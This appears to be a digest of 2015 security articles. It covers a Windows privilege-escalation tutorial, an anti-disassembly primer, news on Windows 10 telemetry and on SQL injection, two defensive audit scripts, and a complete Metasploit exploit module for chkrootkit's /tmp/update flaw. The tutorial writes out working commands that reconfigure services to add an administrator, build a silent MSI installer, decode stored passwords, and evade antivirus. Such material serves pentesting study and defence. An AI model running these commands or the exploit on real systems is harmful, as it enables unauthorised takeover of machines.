Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool:

sc stop PFNet
sc start PFNet

LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point!

Metasploit Module: exploit/windows/local/trusted_service_path

This module only requires that you link it to an existing Meterpreter session before running:

A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable.
Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me…

Vulnerable Services

When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting:

Service Binaries
Windows Services

The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VOILA!

The latter refers to the actual Windows Service and the ability to modify its properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look…

The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications.
While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim.

Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level):

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Well, what do we have here? PFNet shows its face once more! SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and oftentimes these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*).

Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through.

Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service:

sc qc PFNet

Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validating SERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group:

sc config PFNET binpath= "net user rottenadmin P@ssword123! /add"
sc stop PFNET
sc start PFNET
sc config PFNET binpath= "net localgroup Administrators rottenadmin /add"
sc stop PFNET
sc start PFNET

YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only after issuing our malicious commands:

Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention.

Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?).

Metasploit Module: exploit/windows/local/service_permissions

This module only requires that you link it to an existing Meterpreter session before running:

This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt.
AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because

For this to occur, there are two registry entries that have to be set to the value of “1” on the machine:

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]
“AlwaysInstallElevated”=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
“AlwaysInstallElevated”=dword:00000001

The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist.

Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group:

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi

Once we have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi

The properties of the switches utilized in the above Msiexec command are below:

/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation

Once run, we can check to validate that our account was created and added to the Local Administrator Group:

Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system.

Metasploit Module: exploit/windows/local/always_install_elevated

As you can see below, this module simply requires that you link it to an existing session prior to running:

There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment.

Unattended Installs

Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor- and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an Extensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts!

While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders:

C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\

Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system.
These files can also contain credential information utilized during deployment of the operating system, allowing us to escalate privileges.

Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts):

<UserAccounts>
    <LocalAccounts>
        <LocalAccount>
            <Password>
                <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>
                <PlainText>false</PlainText>
            </Password>
            <Description>Local Administrator</Description>
            <DisplayName>Administrator</DisplayName>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
        </LocalAccount>
    </LocalAccounts>
</UserAccounts>

In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following:

echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d

So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”.

Note: Under the <UserAccounts> section, you may also see <AdministratorPassword> tags, which are another way to configure the Local Administrator account.

Metasploit Module: post/windows/gather/enum_unattend

This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in:

After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as sysprep.xml and sysprep.inf. On the positive side, this module will search the entire drive in an attempt to locate Unattend files.
Group Policy Preferences (GPP)

Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???.

!!! Important Note Regarding Anti-Virus !!!

During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me!

Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.

Additional Resources

Windows Privilege Escalation Fundamentals

This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read…

PowerUp

PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent.

Source: http://toshellandback.com/2015/11/24/ms-priv-esc/
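As an added audit example (not code from the post or its author), here is a Python script that applies two of the checks described above from the defender's side: it parses a constructed dump of `wmic service get name,displayname,pathname,startmode /format:csv`, lists the probe paths Windows would try for each unquoted auto-start service path, and reports which accounts in a constructed Unattend.xml fragment carry a stored password, with the Base64 and "Password"-suffix handling the post describes. The CSV output shape, the sample rows and the Unattend fragment are assumptions made for the example.

```python
"""Audit helpers for two of the misconfigurations walked through above:
unquoted service paths and leftover Unattend.xml credentials.
All sample data below is constructed for the example."""
import base64
import csv
import io
import re
import xml.etree.ElementTree as ET

# Constructed sample of `wmic service get name,displayname,pathname,startmode /format:csv`
# (the CSV form is assumed here because its columns are unambiguous to parse).
SAMPLE_WMIC_CSV = r'''Node,DisplayName,Name,PathName,StartMode
GREED,Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
GREED,PFNet,PFNet,C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe,Auto
GREED,Quoted Service,QSvc,"""C:\Program Files\Vendor\svc.exe"" -run",Auto
GREED,Manual Thing,MThing,C:\Program Files\Other\thing.exe,Manual
'''

# Constructed Unattend.xml fragment in the same shape as the snippet above.
SAMPLE_UNATTEND = """<?xml version="1.0"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>
              <PlainText>false</PlainText>
            </Password>
            <Description>Local Administrator</Description>
            <DisplayName>Administrator</DisplayName>
            <Group>Administrators</Group>
            <Name>Administrator</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def parse_wmic_csv(text):
    """Rows of the wmic CSV output as dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text.strip())))


def lookup_candidates(pathname):
    """Executables Windows would try, in order, for an unquoted service path.
    Returns [] for quoted paths and for paths without spaces (not affected)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []
    # Only the portion up to the binary name matters; trailing arguments are ignored.
    m = re.match(r'(.*?\.exe)(?:\s|$)', pathname, re.IGNORECASE)
    exe_path = m.group(1) if m else pathname
    if ' ' not in exe_path:
        return []
    parts = exe_path.split(' ')
    candidates = [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]
    candidates.append(exe_path)
    return candidates


def find_unquoted_services(text, skip_windows_dir=True):
    """(service name, probe list) for auto-start services whose path is unquoted and has spaces."""
    findings = []
    for row in parse_wmic_csv(text):
        if row['StartMode'].strip().lower() != 'auto':
            continue
        path = row['PathName']
        if skip_windows_dir and path.lower().startswith('c:\\windows\\'):
            continue
        candidates = lookup_candidates(path)
        if candidates:
            findings.append((row['Name'], candidates))
    return findings


def _local(tag):
    """Strip the XML namespace from a tag name."""
    return tag.rsplit('}', 1)[-1]


def decode_unattend_password(value, plaintext):
    """Recover the password as the administrator set it: Base64-decode and drop the
    'Password' suffix Windows appends before encoding. Decoded as UTF-8 to match the
    snippet above (real Unattend files may carry UTF-16LE)."""
    if plaintext:
        return value
    decoded = base64.b64decode(value).decode('utf-8')
    return decoded[:-len('Password')] if decoded.endswith('Password') else decoded


def unattend_accounts(xml_text):
    """(name, group, has_stored_password) for every <LocalAccount> in an Unattend file."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != 'LocalAccount':
            continue
        fields = {_local(child.tag): child for child in el}
        name = (fields['Name'].text or '').strip() if 'Name' in fields else ''
        group = (fields['Group'].text or '').strip() if 'Group' in fields else ''
        pw = fields.get('Password')
        has_pw = pw is not None and any(
            _local(c.tag) == 'Value' and (c.text or '').strip() for c in pw)
        found.append((name, group, has_pw))
    return found


if __name__ == '__main__':
    for name, probes in find_unquoted_services(SAMPLE_WMIC_CSV):
        print('unquoted service path:', name)
        for p in probes:
            print('   would probe', p)
    for acct in unattend_accounts(SAMPLE_UNATTEND):
        print('unattend account (name, group, stored password?):', acct)
```

Run against a real export, the probe list for each finding is the set of locations whose folder ACLs need checking with icacls, and any Unattend account reported with a stored password is a file that should have been removed after deployment.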
19. Anti-Disassembly techniques used by malware (a primer)

Rahul Nair | 22 Nov 2015

There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro?). Implementing these cunning asm instructions will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly.

Once upon a time there were 2 kinds of disassembly algorithms: linear disassembly and flow-oriented disassembly. The former was used in tutorials / nobody gives a damn; it is not used that much in disassemblers. What we are concerned about is the latter, which is used in IDA Pro and sometimes gamed by malware authors.

1. Jump Instructions to a location with constant value

This is the most used trick by malware writers/anti-disassembly programs which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA Pro are not that clever (no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8, which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. Now we can fix this with ease in IDA Pro. Do that by pressing D on the E8 and the C key on the 8B opcode and voila! you get what is actually being interpreted.
After playing around more with the C & D keys you get the following in IDA which seems legit.

Now what has happened here is that the author might have inserted something known as a rogue byte which confuses IDA Pro, leading to a wrong interpretation of the rest of the opcode. This is a simple technique and if you don't like to see that ugly E8 byte you could NOP it out.

2. Jump Instructions to the Same target

IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV, since both the jz and jnz are present it is similar to an unconditional jump. Once IDA Pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same. A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA Pro as mentioned in 1. we get the following code.

3. Ping-Pong jumps

I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1. and maybe even a bit of 2. Let's look at this innocent jump below. This jump goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcodes and make IDA interpret the rest as code instead, we get the following. Yay, more jumps. Once again ignoring the other E8 byte and considering the rest as code, the result is as follows: We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis.

4. Usage of Function Pointers

Instead of a screenshot here is a piece of code:

mov     [ebp+var_8], offset sub_4211C1
push    4Ah
call    [ebp+var_8]

What happens above is that a function is called via use of a reference to an address.
For example for the function call it would get the function string name by the use of some weird bunch of decoding subroutine and save the value in an offset sub_4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view, though it doesn't seem to cause massive harm, this coupled with other anti-disassembly techniques can lead to annoyance for an analyst.

There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit :P), using your own Structured Exception Handler (SEH) and screwing around with the stack-frame construction in IDA Pro.

Source: Anti-Disassembly techniques used by malware (a primer)
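To make the linear-versus-flow-oriented distinction concrete, the following Python toy decoder is an added example, not code from the article: it knows a handful of real x86 encodings and runs both strategies over a constructed byte sequence that uses the jz/jnz-to-the-same-target trick with a rogue E8 byte from section 2. The extra mode that treats the pair as one unconditional jump is the analyst-side fix the article performs by hand with the C and D keys; the instruction subset and the sample bytes are assumptions for the example.

```python
"""Toy decoder for a handful of real x86 encodings, used to contrast linear
sweep with flow-oriented disassembly on the jz/jnz-to-the-same-target trick
with a rogue 0xE8 byte. Constructed bytes; not the article's code."""
import struct

# Constructed sample (offset: bytes  instruction):
#   0: 74 03            jz  +3   -> 5
#   2: 75 01            jnz +1   -> 5   (both branches land on 5)
#   4: E8               rogue byte, never executed
#   5: B8 01 00 00 00   mov eax, 1
#  10: C3               ret
SAMPLE = bytes.fromhex("74 03 75 01 E8 B8 01 00 00 00 C3")

_SIZES = {0x90: 1, 0xC3: 1, 0xEB: 2, 0x74: 2, 0x75: 2, 0xE8: 5, 0xB8: 5}
_JUMPS = {0xEB: "jmp", 0x74: "jz", 0x75: "jnz"}


def decode(buf, off):
    """Decode one instruction -> (mnemonic, length, branch target or None, falls through)."""
    op = buf[off]
    ln = _SIZES.get(op, 1)
    if op not in _SIZES or off + ln > len(buf):
        return ("db 0x%02x" % op, 1, None, True)      # unknown or truncated: treat as data
    if op == 0x90:
        return ("nop", 1, None, True)
    if op == 0xC3:
        return ("ret", 1, None, False)
    if op in _JUMPS:
        rel = struct.unpack_from("<b", buf, off + 1)[0]
        return (_JUMPS[op], 2, off + 2 + rel, op != 0xEB)
    if op == 0xE8:
        rel = struct.unpack_from("<i", buf, off + 1)[0]
        return ("call", 5, off + 5 + rel, True)
    imm = struct.unpack_from("<I", buf, off + 1)[0]       # 0xB8: mov eax, imm32
    return ("mov eax, 0x%x" % imm, 5, None, True)


def linear_sweep(buf):
    """Decode every byte in order: the rogue E8 swallows the real mov."""
    listing, off = {}, 0
    while off < len(buf):
        mn, ln, _, _ = decode(buf, off)
        listing[off] = mn
        off += ln
    return listing


def flow_oriented(buf, merge_jcc_pairs=False):
    """Recursive traversal that decodes the fall-through (false) branch before the
    jump target, as the article describes for IDA. With merge_jcc_pairs=True, a jz
    immediately followed by a jnz to the same target is treated as one unconditional
    jump, so the byte after the pair is never decoded."""
    listing, claimed, work = {}, set(), [0]
    while work:
        off = work.pop()
        if off >= len(buf) or off in claimed:     # already inside a decoded instruction
            continue
        mn, ln, target, falls = decode(buf, off)
        if merge_jcc_pairs and mn == "jz" and off + ln < len(buf):
            nxt = decode(buf, off + ln)
            if nxt[0] == "jnz" and nxt[2] == target:
                listing[off], listing[off + ln] = mn, nxt[0]
                claimed.update(range(off, off + ln + nxt[1]))
                work.append(target)
                continue
        listing[off] = mn
        claimed.update(range(off, off + ln))
        if target is not None and 0 <= target < len(buf):
            work.append(target)          # pushed first ...
        if falls:
            work.append(off + ln)        # ... so the false branch is popped first
    return listing


def uncovered(buf, listing):
    """Offsets no decoded instruction covers (what the disassembler would show as data)."""
    covered = set()
    for off in listing:
        covered.update(range(off, off + decode(buf, off)[1]))
    return [o for o in range(len(buf)) if o not in covered]


if __name__ == "__main__":
    for name, listing in (("linear", linear_sweep(SAMPLE)),
                          ("flow", flow_oriented(SAMPLE)),
                          ("flow+merge", flow_oriented(SAMPLE, merge_jcc_pairs=True))):
        print(name, sorted(listing.items()), "data bytes:", uncovered(SAMPLE, listing))
```

Both the linear sweep and the naive traversal report a call at offset 4 and never see the mov at offset 5; only the merged mode leaves offset 4 as a data byte and decodes the real instruction behind it.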
20. Microsoft Makes Windows 10 Automatic Spying Worse

Microsoft has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 deals are surprisingly great. But a new discovery has been made which isn’t good news – at all…

Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart of tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft.

Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequently confirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and b) misleading (don’t ‘Connected User Experiences’ sound great?).

Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound

Even sneakier is, in being renamed, Microsoft also reset users’ preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant.
The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack:

Hold down the Windows key and tap the R key
In the box that opens type ‘services.msc’ and press the Enter key
In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it
In the ‘Service status’ section click ‘Stop’
Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’

Note: it is advisable to disable, NOT delete, the service. Deleting it can cause problems.

Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound

So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does.

While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product. That said such a move is consistent with the negatives in Threshold 2, namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft products/services as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more.

In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worse still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations.
It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever Free version of Windows, that’s not great.

How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this…

Source: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/
21. HTTPS is ok (it also depends on you). HTTP is not ok. Tor Browser is ok (it also depends on you). Mozilla with a Tor proxy is not ok. https://hackertarget.com/tor-exit-node-visualization/
22. Chkrootkit Local Privilege Escalation

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chkrootkit Local Privilege Escalation',
      'Description'    => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec.

        WfsDelay is set to 24h, since this is how often a chkrootkit
        scan is scheduled by default.
      },
      'Author'         => [
        'Thomas Stangner',         # Original exploit
        'Julien "jvoisin" Voisin'  # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')
    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')
    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end

Source:
https://www.exploit-db.com/exploits/38775/
23. WRITTEN BY JOSEPH COX

November 20, 2015 // 08:00 AM EST

One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerability discovered two years before he was even born.

That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees, grab data from the Wall Street Journal, and hit the sites of US federal agencies.

“It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.”

But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around?

SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security.

SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote.

In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote.
“According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.”

Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at the number one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation, a non-profit that monitors the threats that websites face.

Phrack's current logo. Image: Phrack

“SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview.

“When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.”

But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data.

An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said.

Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, a security researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap.
“It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added.

When the attacker is looking for a target to hit in the first place, that's just as simple to automate too.

Image: sqlmap

“They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.”

“You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample tutorials on how to carry out an SQLi attack.

The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers' data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input.

“The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email.

Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it.
So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening?

“Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.”

Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attack, despite them being relatively straight forward to implement.

Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said.

